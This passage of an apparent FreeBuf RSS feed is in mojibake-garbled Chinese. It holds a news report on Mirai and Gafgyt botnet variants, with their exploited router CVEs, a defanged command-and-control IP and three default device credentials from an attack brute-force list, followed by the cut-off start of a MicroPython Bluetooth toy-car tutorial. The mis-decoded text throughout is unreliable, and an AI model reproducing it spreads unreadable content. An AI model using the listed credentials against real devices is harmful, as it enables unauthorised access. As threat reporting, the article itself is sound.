”ç©¶æŠ¥å‘Šæˆ‘ä»¬å¯ä»¥çœ‹åˆ°ï¼Œåœ¨2016å¹´9月份,全çƒèŒƒå›´å†…å·²å‘现的感染了Bashliteæ¶æ„软件的设备数é‡å°±é«˜è¾¾æ•°ç™¾ä¸‡å°ã€‚ PaloAltoNetwork在其å‘å¸ƒçš„åˆ†æžæŠ¥å‘Šä¸æŒ‡å‡ºï¼šâ€œæˆªæ¢è‡³2018å¹´5月底,网络上已ç»å‡ºçŽ°äº†ä¸‰æ¬¾åŸºäºŽMiraiå’ŒGafgytæ¶æ„软件家æ—çš„æ¶æ„软件å˜ç§æºç äº†ï¼Œè¿™äº›æ¶æ„软件å˜ç§çš„æºä»£ç 被直接公布在了互è”网ä¸ï¼Œä»»ä½•人都å¯ä»¥éšæ„获å–并基于它们进行自定义开å‘,其ä¸çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¶‰åŠåˆ°äº†å¤šä¸ªèƒ½å¤Ÿå½±å“物è”ç½‘è®¾å¤‡å®‰å…¨æ€§çš„å·²çŸ¥æ¼æ´žã€‚æ ¹æ®æˆ‘ä»¬å¯¹æ¶æ„软件å˜ç§æ ·æœ¬çš„分æžï¼Œæˆ‘们å‘现一个简å•çš„æ¶æ„软件å˜ç§å°±èƒ½å¤Ÿä¸€æ¬¡æ€§åˆ©ç”¨å¤šè¾¾11ä¸ªå®‰å…¨æ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚与之相比,就连è‡åæ˜è‘—çš„ IoTReaperæ¶æ„è½¯ä»¶ï¼ˆè¯¥æ¶æ„è½¯ä»¶åŒæ ·å€Ÿé‰´äº†Miraiçš„æºä»£ç ,但是它还集æˆäº†LUA环境,并自带有ä¹å¥—æ¼æ´žåˆ©ç”¨ä»£ç )都“黯然失色â€äº†ã€‚†这两款僵尸网络å˜ç§çš„æœ€æ–°ç‰ˆæœ¬èƒ½å¤Ÿåˆ©ç”¨D-Link DSL-2750B设备的OSå‘½ä»¤æ³¨å…¥æ¼æ´žï¼Œå¹¶ä¸”还集æˆäº†å¤šä¸ªæœ€æ–°çš„Metasploit模å—。 安全专家表示,这两个僵尸网络活动近期çªç„¶å˜å¾—éžå¸¸æ´»è·ƒï¼Œä»–们推测这两者之间å¯èƒ½ä¼šæœ‰æŸç§å…³è”,很å¯èƒ½æ˜¯åŒä¸€æ”»å‡»ç»„织所为。 ç ”ç©¶äººå‘˜æ‰€å‘çŽ°çš„ç¬¬ä¸€ä¸ªæ¶æ„活动与Omni僵尸网络(Miraiæ¶æ„软件的最新å˜ç§ä¹‹ä¸€ï¼‰æœ‰å…³ã€‚Omni僵尸网络å¯åˆ©ç”¨çš„å®‰å…¨æ¼æ´žèŒƒå›´éžå¸¸å¹¿ï¼Œä¾‹å¦‚DasanGPONè·¯ç”±å™¨çš„æ¼æ´žCVE-2018-10561å’ŒCVE-2018-1562,åŽä¸ºè·¯ç”±å™¨çš„æ¼æ´žCVE-2017–17215,D-Linkè®¾å¤‡çš„ä¸¤ä¸ªå‘½ä»¤æ‰§è¡Œæ¼æ´žï¼ŒVacron NVRè®¾å¤‡çš„ç›¸å…³å®‰å…¨æ¼æ´žï¼ŒJAWS WebæœåŠ¡å™¨çš„å‘½ä»¤æ‰§è¡Œæ¼æ´žï¼Œä»¥åŠè¶…过70家厂商的CCTVå’ŒDVRè®¾å¤‡æ¼æ´žç‰ç‰ã€‚ PaloAltoçš„ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œæ‰€æœ‰çš„è¿™äº›æ¼æ´žéƒ½æ˜¯å·²çŸ¥æ¼æ´žï¼Œå¹¶ä¸”å·²ç»æœ‰å¾ˆå¤šåƒµå°¸ç½‘络æ£åœ¨åˆ©ç”¨è¿™äº›æ¼æ´žå®žæ–½æ”»å‡»ï¼Œä½†è¿™ä¹Ÿæ˜¯ç¬¬ä¸€æ¬¡æœ‰Miraiå˜ç§ä¸€æ¬¡æ€§åˆ©ç”¨è¿™åä¸€ä¸ªæ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚ 最åŽä¸€ä¸ªMiraiå˜ç§ä½¿ç”¨äº†IP地å€213[.]183.53.120æ¥æ‰˜ç®¡Payload,并将其作为命令控制æœåŠ¡å™¨ï¼Œè€ŒæŸäº›Gafgytæ ·æœ¬åŒæ ·ä¹Ÿä½¿ç”¨çš„æ˜¯è¿™ä¸ªIP地å€ã€‚ ç ”ç©¶äººå‘˜æ‰€è§‚å¯Ÿåˆ°çš„ç¬¬äºŒä¸ªæ¶æ„活动使用的是跟之å‰ç›¸åŒçš„æ¼æ´žåˆ©ç”¨æœºåˆ¶ï¼Œä½†å®ƒè¿˜ä¼šé¢å¤–进行å‡è¯çˆ†ç ´æ”»å‡»ã€‚ç ”ç©¶äººå‘˜æ ¹æ®è¯¥æ´»åŠ¨æ‰€ä½¿ç”¨çš„Shell脚本以åŠç›¸å…³ä»£ç å称,将该活动命å为了Okane。 ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œè·Ÿä¹‹å‰çš„æ¶æ„æ´»åЍä¸åŒçš„æ˜¯ï¼Œè¿™äº›æ ·æœ¬è¿˜ä¼šè¿›è¡Œå‡è¯æš´åŠ›ç ´è§£æ”»å‡»ï¼Œè€Œçˆ†ç ´åˆ—è¡¨ä¸ä¹Ÿæœ‰ä¸€äº›ä¸å¸¸è§çš„æ¡ç›®ï¼Œæ¯”å¦‚è¯´ï¼š root/t0talc0ntr0l4!– Control4设备的默认å‡è¯ admin/adc123– ADCFlexWave Prism设备的默认å‡è¯ mg3500/merlin– Camtron IP æ‘„åƒå¤´è®¾å¤‡çš„默认å‡è¯ 该活动ä¸çš„æŸäº›æ ·æœ¬è¿˜åœ¨Miraiæºç 䏿·»åŠ äº†ä¸¤ä¸ªé¢å¤–çš„DDoS功能。 é™¤äº†ä¸Šè¿°ä¸¤ä¸ªæ¶æ„活动之外,PaloAlto Networksçš„ç ”ç©¶äººå‘˜è¿˜å‘现了第三个僵尸网络活动,å为Hakai,该僵尸网络会å°è¯•利用之å‰ä»‹ç»çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¥è®©ç›®æ ‡è®¾å¤‡æ„ŸæŸ“Gafgytæ¶æ„软件。 PaloAltoNetworksæŒ‡å‡ºï¼Œè¿™ä¸€æ³¢æ–°çš„ç½‘ç»œæ”»å‡»æ´»åŠ¨è¯æ˜Žäº†æ”»å‡»è€…构建大型僵尸网络的能力æ£åœ¨å˜å¾—è¶Šæ¥è¶Šå¼ºï¼Œéšç€å„ç§åƒµå°¸ç½‘络å˜ç§æºç 泄露在互è”网上,之åŽè¿˜ä¼šå‡ºçŽ°æ›´å¤šä¸åŒç±»åž‹ä¸”ç ´å力更强的僵尸网络攻击。除æ¤ä¹‹å¤–,å„大厂商也应该æå‡æ¼æ´žè¡¥ä¸çš„开呿•ˆçŽ‡ï¼Œå°½å¯èƒ½åœ°ä¿æŠ¤ç”¨æˆ·çš„ç»ˆç«¯åŠæ•°æ®å®‰å…¨ã€‚ *å‚è€ƒæ¥æºï¼šsecurityaffairs,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
393 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">安全专家è¦å‘Šç§°ï¼Œå¹¿å¤§ç”¨æˆ·è¿‘期应该å°å¿ƒ<a href="https://securityaffairs.co/wordpress/50929/cyber-crime/linux-mirai-elf.html" ref="">Mirai</a>å’Œ<a href="https://securityaffairs.co/wordpress/45820/cyber-crime/linux-remaiten-iot-botnet.html">Gafgyt</a>åƒµå°¸ç½‘ç»œäº†ï¼Œå› ä¸ºè¿™ä¸¤ä¸ªè‡åæ˜è‘—的物è”网僵尸网络åˆå¼€å§‹æ´»è·ƒäº†èµ·æ¥ã€‚</b></p>
394<p><img alt="1.png" src="http://image.3001.net/images/20180726/15325701493248.png!small" width="600" height="400"></p>
395<p>å®‰å…¨ä¸“å®¶é€šè¿‡ç ”ç©¶å‘现,Miraiå’ŒGafgyt这两个僵尸网络近期ååˆ†æ´»è·ƒï¼Œä¸æŽ’é™¤æ”»å‡»è€…è®¡åˆ’è¿›è¡Œæ–°ä¸€è½®å¤§è§„æ¨¡ç½‘ç»œæ”»å‡»çš„å¯èƒ½æ€§ã€‚由于Mirai僵尸网络的æºä»£ç æ¤å‰å·²æ³„露在网络上,紧跟ç€çš„就是å„ç§Miraiå˜ç§å¼€å§‹æ³›æ»¥äºŽâ€œæ±Ÿæ¹–â€ã€‚仅在2018年,就已ç»å‡ºçŽ°äº†ç±»ä¼¼<a href="https://securityaffairs.co/wordpress/73599/cyber-crime/satori-botnet-resurrection.html">Satori</a>ã€<a href="https://securityaffairs.co/wordpress/68153/cyber-crime/masuta-botnet.html">Masuta</a>ã€<a href="https://securityaffairs.co/wordpress/72640/cyber-crime/wicked-mirai.html">WickedMirai</a>〠<a href="https://securityaffairs.co/wordpress/68610/cyber-crime/jenx-botnet.html">JenX</a>ã€Omniå’Œ<a href="https://securityaffairs.co/wordpress/69449/cyber-crime/omg-botnet.html">OMG</a>ç‰å¤šæ¬¾Mirai僵尸网络å˜ç§ã€‚</p>
396<p>Gafgyt僵尸网络,åˆå<a href="https://securityaffairs.co/wordpress/50824/malware/bashlite-botnets.html">Bashlite</a>或<a href="https://securityaffairs.co/wordpress/52845/cyber-crime/linuxirctelnet-malware.html">Lizkebab</a>,该僵尸网络首次出现于2014年,其æºä»£ç 泄露于2015å¹´åˆã€‚æ ¹æ®Flashpointçš„ç ”ç©¶æŠ¥å‘Šæˆ‘ä»¬å¯ä»¥çœ‹åˆ°ï¼Œåœ¨2016å¹´9月份,全çƒèŒƒå›´å†…å·²å‘现的感染了Bashliteæ¶æ„软件的设备数é‡å°±é«˜è¾¾æ•°ç™¾ä¸‡å°ã€‚</p>
397<p>PaloAltoNetwork在其å‘å¸ƒçš„åˆ†æžæŠ¥å‘Šä¸æŒ‡å‡ºï¼šâ€œæˆªæ¢è‡³2018å¹´5月底,网络上已ç»å‡ºçŽ°äº†ä¸‰æ¬¾åŸºäºŽMiraiå’ŒGafgytæ¶æ„软件家æ—çš„æ¶æ„软件å˜ç§æºç äº†ï¼Œè¿™äº›æ¶æ„软件å˜ç§çš„æºä»£ç 被直接公布在了互è”网ä¸ï¼Œä»»ä½•人都å¯ä»¥éšæ„获å–并基于它们进行自定义开å‘,其ä¸çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¶‰åŠåˆ°äº†å¤šä¸ªèƒ½å¤Ÿå½±å“物è”ç½‘è®¾å¤‡å®‰å…¨æ€§çš„å·²çŸ¥æ¼æ´žã€‚æ ¹æ®æˆ‘ä»¬å¯¹æ¶æ„软件å˜ç§æ ·æœ¬çš„分æžï¼Œæˆ‘们å‘现一个简å•çš„æ¶æ„软件å˜ç§å°±èƒ½å¤Ÿä¸€æ¬¡æ€§åˆ©ç”¨å¤šè¾¾11ä¸ªå®‰å…¨æ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚与之相比,就连è‡åæ˜è‘—çš„ IoTReaperæ¶æ„è½¯ä»¶ï¼ˆè¯¥æ¶æ„è½¯ä»¶åŒæ ·å€Ÿé‰´äº†Miraiçš„æºä»£ç ,但是它还集æˆäº†LUA环境,并自带有ä¹å¥—æ¼æ´žåˆ©ç”¨ä»£ç )都“黯然失色â€äº†ã€‚â€</p>
398<p>这两款僵尸网络å˜ç§çš„æœ€æ–°ç‰ˆæœ¬èƒ½å¤Ÿåˆ©ç”¨D-Link DSL-2750B设备的OSå‘½ä»¤æ³¨å…¥æ¼æ´žï¼Œå¹¶ä¸”还集æˆäº†å¤šä¸ªæœ€æ–°çš„Metasploit模å—。</p>
399<p>安全专家表示,这两个僵尸网络活动近期çªç„¶å˜å¾—éžå¸¸æ´»è·ƒï¼Œä»–们推测这两者之间å¯èƒ½ä¼šæœ‰æŸç§å…³è”,很å¯èƒ½æ˜¯åŒä¸€æ”»å‡»ç»„织所为。</p>
400<p>ç ”ç©¶äººå‘˜æ‰€å‘çŽ°çš„ç¬¬ä¸€ä¸ªæ¶æ„活动与Omni僵尸网络(Miraiæ¶æ„软件的最新å˜ç§ä¹‹ä¸€ï¼‰æœ‰å…³ã€‚Omni僵尸网络å¯åˆ©ç”¨çš„å®‰å…¨æ¼æ´žèŒƒå›´éžå¸¸å¹¿ï¼Œä¾‹å¦‚DasanGPONè·¯ç”±å™¨çš„æ¼æ´žCVE-2018-10561å’ŒCVE-2018-1562,åŽä¸ºè·¯ç”±å™¨çš„æ¼æ´žCVE-2017–17215,D-Linkè®¾å¤‡çš„ä¸¤ä¸ªå‘½ä»¤æ‰§è¡Œæ¼æ´žï¼ŒVacron NVRè®¾å¤‡çš„ç›¸å…³å®‰å…¨æ¼æ´žï¼ŒJAWS WebæœåŠ¡å™¨çš„å‘½ä»¤æ‰§è¡Œæ¼æ´žï¼Œä»¥åŠè¶…过70家厂商的CCTVå’ŒDVRè®¾å¤‡æ¼æ´žç‰ç‰ã€‚</p>
401<p>PaloAltoçš„ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œæ‰€æœ‰çš„è¿™äº›æ¼æ´žéƒ½æ˜¯å·²çŸ¥æ¼æ´žï¼Œå¹¶ä¸”å·²ç»æœ‰å¾ˆå¤šåƒµå°¸ç½‘络æ£åœ¨åˆ©ç”¨è¿™äº›æ¼æ´žå®žæ–½æ”»å‡»ï¼Œä½†è¿™ä¹Ÿæ˜¯ç¬¬ä¸€æ¬¡æœ‰Miraiå˜ç§ä¸€æ¬¡æ€§åˆ©ç”¨è¿™åä¸€ä¸ªæ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚</p>
402<p>最åŽä¸€ä¸ªMiraiå˜ç§ä½¿ç”¨äº†IP地å€213[.]183.53.120æ¥æ‰˜ç®¡Payload,并将其作为命令控制æœåŠ¡å™¨ï¼Œè€ŒæŸäº›Gafgytæ ·æœ¬åŒæ ·ä¹Ÿä½¿ç”¨çš„æ˜¯è¿™ä¸ªIP地å€ã€‚</p>
403<p>ç ”ç©¶äººå‘˜æ‰€è§‚å¯Ÿåˆ°çš„ç¬¬äºŒä¸ªæ¶æ„活动使用的是跟之å‰ç›¸åŒçš„æ¼æ´žåˆ©ç”¨æœºåˆ¶ï¼Œä½†å®ƒè¿˜ä¼šé¢å¤–进行å‡è¯çˆ†ç ´æ”»å‡»ã€‚ç ”ç©¶äººå‘˜æ ¹æ®è¯¥æ´»åŠ¨æ‰€ä½¿ç”¨çš„Shell脚本以åŠç›¸å…³ä»£ç å称,将该活动命å为了Okane。</p>
404<p>ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œè·Ÿä¹‹å‰çš„æ¶æ„æ´»åЍä¸åŒçš„æ˜¯ï¼Œè¿™äº›æ ·æœ¬è¿˜ä¼šè¿›è¡Œå‡è¯æš´åŠ›ç ´è§£æ”»å‡»ï¼Œè€Œçˆ†ç ´åˆ—è¡¨ä¸ä¹Ÿæœ‰ä¸€äº›ä¸å¸¸è§çš„æ¡ç›®ï¼Œæ¯”å¦‚è¯´ï¼š</p>
405<blockquote><p>root/t0talc0ntr0l4!– Control4设备的默认å‡è¯</p>
406<p>admin/adc123– ADCFlexWave Prism设备的默认å‡è¯</p>
407<p>mg3500/merlin– Camtron IP æ‘„åƒå¤´è®¾å¤‡çš„默认å‡è¯</p>
408</blockquote>
409<p>该活动ä¸çš„æŸäº›æ ·æœ¬è¿˜åœ¨Miraiæºç 䏿·»åŠ äº†ä¸¤ä¸ªé¢å¤–çš„DDoS功能。</p>
410<p><img alt="2.png" src="http://image.3001.net/images/20180726/15325701649218.png!small" width="362" height="677"></p>
411<p>é™¤äº†ä¸Šè¿°ä¸¤ä¸ªæ¶æ„活动之外,PaloAlto Networksçš„ç ”ç©¶äººå‘˜è¿˜å‘现了第三个僵尸网络活动,å为Hakai,该僵尸网络会å°è¯•利用之å‰ä»‹ç»çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¥è®©ç›®æ ‡è®¾å¤‡æ„ŸæŸ“Gafgytæ¶æ„软件。</p>
412<p>PaloAltoNetworksæŒ‡å‡ºï¼Œè¿™ä¸€æ³¢æ–°çš„ç½‘ç»œæ”»å‡»æ´»åŠ¨è¯æ˜Žäº†æ”»å‡»è€…构建大型僵尸网络的能力æ£åœ¨å˜å¾—è¶Šæ¥è¶Šå¼ºï¼Œéšç€å„ç§åƒµå°¸ç½‘络å˜ç§æºç 泄露在互è”网上,之åŽè¿˜ä¼šå‡ºçŽ°æ›´å¤šä¸åŒç±»åž‹ä¸”ç ´å力更强的僵尸网络攻击。除æ¤ä¹‹å¤–,å„大厂商也应该æå‡æ¼æ´žè¡¥ä¸çš„开呿•ˆçŽ‡ï¼Œå°½å¯èƒ½åœ°ä¿æŠ¤ç”¨æˆ·çš„ç»ˆç«¯åŠæ•°æ®å®‰å…¨ã€‚</p>
413<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼šsecurityaffairs,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
414]]></content:encoded>
415 <wfw:commentRss>http://www.freebuf.com/news/178824.html/feed</wfw:commentRss>
416 <slash:comments>0</slash:comments>
417 </item>
418 <item>
419 <title>TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦</title>
420 <link>http://www.freebuf.com/geek/178005.html</link>
421 <comments>http://www.freebuf.com/geek/178005.html#comments</comments>
422 <pubDate>Thu, 26 Jul 2018 02:00:42 +0000</pubDate>
423 <dc:creator>_æ©™å ã‚</dc:creator>
424 <category><![CDATA[æžå®¢]]></category>
425 <category><![CDATA[tpyboard]]></category>
426 <category><![CDATA[æ— çº¿è£…ç”²å°è½¦]]></category>
427
428 <guid isPermaLink="false">http://www.freebuf.com/?p=178005</guid>
429 <description><![CDATA[智能å°è½¦ä½œä¸ºçŽ°ä»£çš„æ–°å‘æ˜Žï¼Œæ˜¯ä»¥åŽçš„å‘展方å‘,他å¯ä»¥æŒ‰ç…§é¢„先设定的模å¼åœ¨ä¸€ä¸ªçŽ¯å¢ƒé‡Œè‡ªåŠ¨çš„è¿ä½œï¼Œä¸éœ€è¦äººä¸ºçš„管ç†ï¼Œå¯åº”用于科å¦å‹˜æŽ¢ç‰ç‰çš„用途。智能å°è½¦èƒ½å¤Ÿå®žæ—¶æ˜¾ç¤ºæ—¶é—´ã€é€Ÿåº¦ã€é‡Œç¨‹ï¼Œå…·æœ‰è‡ªåŠ¨å¯»è¿¹ã€å¯»å…‰ã€é¿éšœåŠŸèƒ½ï¼Œå¯ç¨‹æŽ§è¡Œé©¶é€Ÿåº¦ã€å‡†ç¡®å®šä½åœè½¦ï¼Œè¿œç¨‹ä¼ 输图åƒç‰åŠŸèƒ½ã€‚ä¸‹é¢å¸¦å¤§å®¶åšä¸€ä¸ªæ™ºèƒ½è“牙å°è½¦ï¼Œç”¨æ‰‹æœºAPPæ¥æŽ§åˆ¶å°è½¦å‰è¿›ã€åŽé€€ã€å‘å·¦ã€å‘å³ã€åœæ¢ï¼Œæœ¬æ¬¡è“牙å°è½¦çš„设计在于探索è“牙智能å°è½¦çš„设计ç†å¿µåŠè®¾è®¡æ–¹æ³•,å¦ä¹ 一下PWMæŽ§åˆ¶ç”µæœºå·®é€Ÿæ¥æŽ§åˆ¶å°è½¦çš„æ–¹å‘,下é¢å°±åŠ¨æ‰‹æžèµ·æ¥å§ï¼ï¼ï¼ï¼ï¼ ä¸€ã€æ•ˆæžœå±•示 给大家上视频连接,å¯ä»¥è“牙控制,å¯ä»¥æ‰‹æŸ„控制哦ï¼ï¼ï¼ 看ä¸åˆ°ï¼Ÿç‚¹è¿™é‡Œ äºŒã€ææ–™å‡†å¤‡ TPYBoard  v102   1å— è“ç‰™ä¸²å£æ¨¡å—  1个 TPYBoard v102å°è½¦æ‰©å±•æ¿ï¼ˆåŒ…å«4个车轮,4个电机) 18650ç”µæ± 2节 æ•°æ®çº¿    1æ¡ æœé‚¦çº¿  è‹¥å¹² è“牙APP (http://old.tpyboard.com/download/tool/190.html) 三ã€è“ç‰™æ¨¡å— è“牙( Bluetoothï¼‰ï¼šæ˜¯ä¸€ç§æ— çº¿æŠ€æœ¯æ ‡å‡†ï¼Œå¯å®žçŽ°å›ºå®šè®¾å¤‡ã€ç§»åŠ¨è®¾å¤‡å’Œæ¥¼å®‡ä¸ªäººåŸŸç½‘ä¹‹é—´çš„çŸè·ç¦»æ•°æ®äº¤æ¢ï¼ˆä½¿ç”¨2.4—2.485GHzçš„ISM波段的UHFæ— çº¿ç”µæ³¢ï¼‰ã€‚ 我们在æ¤ä½¿ç”¨çš„è“牙模å—(HC-06)å·²ç»åœ¨å†…部实现了è“牙å议,ä¸ç”¨æˆ‘们å†åŽ»è‡ªå·±å¼€å‘调试å议。这类模å—一般都是借助于串å£åè®®é€šä¿¡ï¼Œå› æ¤æˆ‘们åªéœ€å€ŸåЩ䏲å£å°†æˆ‘们需è¦å‘é€çš„æ•°æ®å‘é€ç»™è“牙模å—,è“牙模å—会自动将数æ®é€šè¿‡è“牙åè®®å‘é€ç»™é…对好的è“牙设备。 å››ã€å•片机-TPYBoard v102 TPYBoard v102 是éµå¾ªMITå议,由TurnipSmartå…¬å¸åˆ¶ä½œçš„一款MicroPython开呿¿ï¼Œå®ƒåŸºäºŽSTM32F405å•片机,通过USB接å£è¿›è¡Œæ•°æ®ä¼ è¾“ã€‚è¯¥å¼€å‘æ¿å†…ç½®4个LEDç¯ã€ä¸€ä¸ªåŠ é€Ÿåº¦ä¼ æ„Ÿå™¨ï¼Œå¯åœ¨3V-10V之间的电压æ£å¸¸å·¥ä½œã€‚è®©ä½ ä¼šPythonå°±èƒ½åšæžå®¢, 用Python控制硬件,支æŒPythonè¯è¨€çš„开呿¿ã€‚æ¯”æ ‘èŽ“æ´¾æ›´å°å·§ï¼Œæ›´ç®€å•,更便宜,比Arduinoæ›´å¼ºå¤§ï¼Œæ›´åŠ å®¹æ˜“ç¼–ç¨‹ã€‚ 五ã€å°è½¦æ‰©å±•æ¿ ä»¥TPYBoard v102开呿¿ä¸ºä¸»æŽ§æ¿ï¼Œå°è½¦æ‰©å±•æ¿å…·æœ‰å››è·¯PWM调速电机ã€8ä¸ªå¯æŽ§LEDã€1个蜂鸣器ã€5路舵机接å£ã€1个è“牙接å£ã€1个PS2æ— çº¿æŽ¥å£ã€å¼•出TPYBoard v102开呿¿å…¨éƒ¨é’ˆè„šï¼Œå¯è£…载循迹模å—ã€è¶…声波模å—ã€æœºæ¢°æ‰‹è‡‚ã€çº¢å¤–接收头,兼容入门级电机和专业级电机,两节18650å•独供电。 å…ã€æºä»£ç 我们åªéœ€è¦æŠŠTPYBoard v102 æ’å°è½¦æ‰©å±•æ¿ä¸Šï¼ŒæŠŠè“ç‰™æ¨¡å—æ’上,把程åºå†™å…¥å°±è¡Œ,䏋颿˜¯main.pyæºç¨‹åº # main.py -- put your code here!from pyb import Pinfrom pyb import UART N1 = Pin('Y1', Pin.OUT_PP)N2 = Pin('Y2', Pin.OUT_PP)N3 = Pin('Y3', Pin.OUT_PP)N4 = Pin('Y4', Pin.OUT_PP)N5 = Pin('Y6', Pin.OUT_PP)N6 = Pin('Y7', Pin.OUT_PP)N7 = Pin('Y8', Pin.OUT_PP)N8 = Pin('Y9', Pin.OUT_PP) led_red=Pin('Y5', Pin.OUT_PP)led_right=Pin('Y12', Pin.OUT_PP)led_left=Pin('Y11', Pin.OUT_PP) led_red.value(1)led_right.value(0)led_left.value(0)  blue=UART(1,9600,timeout=100) def go(speed): M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+10000) M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)  M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+5000) M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)  M3_0=pyb.Timer(1, […]]]></description>
430 <content:encoded><![CDATA[<p><b style="color: rgb(121, 134, 203);"><img alt="å°è½¦.png" src="http://image.3001.net/images/20180719/15319694333730.png!small" width="690" height="372"></b><b style="color: rgb(0, 176, 80);">智能å°è½¦ä½œä¸ºçŽ°ä»£çš„æ–°å‘æ˜Žï¼Œæ˜¯ä»¥åŽçš„å‘展方å‘,他å¯ä»¥æŒ‰ç…§é¢„先设定的模å¼åœ¨ä¸€ä¸ªçŽ¯å¢ƒé‡Œè‡ªåŠ¨çš„è¿ä½œï¼Œä¸éœ€è¦äººä¸ºçš„管ç†ï¼Œå¯åº”用于科å¦å‹˜æŽ¢ç‰ç‰çš„用途。智能å°è½¦èƒ½å¤Ÿå®žæ—¶æ˜¾ç¤ºæ—¶é—´ã€é€Ÿåº¦ã€é‡Œç¨‹ï¼Œå…·æœ‰è‡ªåŠ¨å¯»è¿¹ã€å¯»å…‰ã€é¿éšœåŠŸèƒ½ï¼Œå¯ç¨‹æŽ§è¡Œé©¶é€Ÿåº¦ã€å‡†ç¡®å®šä½åœè½¦ï¼Œè¿œç¨‹ä¼ 输图åƒç‰åŠŸèƒ½ã€‚ä¸‹é¢å¸¦å¤§å®¶åšä¸€ä¸ªæ™ºèƒ½è“牙å°è½¦ï¼Œç”¨æ‰‹æœºAPPæ¥æŽ§åˆ¶å°è½¦å‰è¿›ã€åŽé€€ã€å‘å·¦ã€å‘å³ã€åœæ¢ï¼Œæœ¬æ¬¡è“牙å°è½¦çš„设计在于探索è“牙智能å°è½¦çš„设计ç†å¿µåŠè®¾è®¡æ–¹æ³•,å¦ä¹ 一下PWMæŽ§åˆ¶ç”µæœºå·®é€Ÿæ¥æŽ§åˆ¶å°è½¦çš„æ–¹å‘,下é¢å°±åŠ¨æ‰‹æžèµ·æ¥å§ï¼ï¼ï¼ï¼ï¼</b></p>
431<h2><b>ä¸€ã€æ•ˆæžœå±•示</b><b></b></h2>
432<p>给大家上视频连接,å¯ä»¥è“牙控制,å¯ä»¥æ‰‹æŸ„控制哦ï¼ï¼ï¼</p>
433<p style="text-align: center;"> <iframe frameborder="0" width="690" height="498" src="https://v.qq.com/iframe/player.html?vid=k0721or47dw&tiny=0&auto=0"></iframe></p>
434<p style="text-align: center;">看ä¸åˆ°ï¼Ÿç‚¹<a href="https://v.qq.com/x/page/k0721or47dw.html" target="_blank" ref="nofollow">这里</a></p>
435<h2><b>äºŒã€ææ–™å‡†å¤‡</b><b></b></h2>
436<blockquote><p>TPYBoard v102 1å—</p>
437<p>è“ç‰™ä¸²å£æ¨¡å— 1个</p>
438<p>TPYBoard v102å°è½¦æ‰©å±•æ¿ï¼ˆåŒ…å«4个车轮,4个电机)</p>
439<p>18650ç”µæ± 2节</p>
440<p>æ•°æ®çº¿ 1æ¡</p>
441<p>æœé‚¦çº¿ 若干</p>
442<p>è“牙APP (<a href="http://old.tpyboard.com/download/tool/190.html">http://old.tpyboard.com/download/tool/190.html</a>)</p>
443</blockquote>
444<h2><b>三ã€è“牙模å—</b><b></b></h2>
445<p><b>è“牙( Bluetooth):</b>æ˜¯ä¸€ç§æ— çº¿æŠ€æœ¯æ ‡å‡†ï¼Œå¯å®žçŽ°å›ºå®šè®¾å¤‡ã€ç§»åŠ¨è®¾å¤‡å’Œæ¥¼å®‡ä¸ªäººåŸŸç½‘ä¹‹é—´çš„çŸè·ç¦»æ•°æ®äº¤æ¢ï¼ˆä½¿ç”¨2.4—2.485GHzçš„ISM波段的UHFæ— çº¿ç”µæ³¢ï¼‰ã€‚</p>
446<p>我们在æ¤ä½¿ç”¨çš„è“牙模å—(HC-06)å·²ç»åœ¨å†…部实现了è“牙å议,ä¸ç”¨æˆ‘们å†åŽ»è‡ªå·±å¼€å‘调试å议。这类模å—一般都是借助于串å£åè®®é€šä¿¡ï¼Œå› æ¤æˆ‘们åªéœ€å€ŸåЩ䏲å£å°†æˆ‘们需è¦å‘é€çš„æ•°æ®å‘é€ç»™è“牙模å—,è“牙模å—会自动将数æ®é€šè¿‡è“牙åè®®å‘é€ç»™é…对好的è“牙设备。</p>
447<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/1531968804638.png!small" width="399" height="364.9767441860465"></p>
448<h2><b>å››ã€å•片机-TPYBoard v102</b><b></b></h2>
449<p>TPYBoard v102 是éµå¾ªMITå议,由TurnipSmartå…¬å¸åˆ¶ä½œçš„一款MicroPython开呿¿ï¼Œå®ƒåŸºäºŽSTM32F405å•片机,通过USB接å£è¿›è¡Œæ•°æ®ä¼ è¾“ã€‚è¯¥å¼€å‘æ¿å†…ç½®4个LEDç¯ã€ä¸€ä¸ªåŠ é€Ÿåº¦ä¼ æ„Ÿå™¨ï¼Œå¯åœ¨3V-10V之间的电压æ£å¸¸å·¥ä½œã€‚è®©ä½ ä¼šPythonå°±èƒ½åšæžå®¢, 用Python控制硬件,支æŒPythonè¯è¨€çš„开呿¿ã€‚æ¯”æ ‘èŽ“æ´¾æ›´å°å·§ï¼Œæ›´ç®€å•,更便宜,比Arduinoæ›´å¼ºå¤§ï¼Œæ›´åŠ å®¹æ˜“ç¼–ç¨‹ã€‚</p>
450<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/15319687975351.png!small" width="399" height="532.4784172661871"> </p>
451<h2>五ã€<b>å°è½¦æ‰©å±•æ¿</b><b></b></h2>
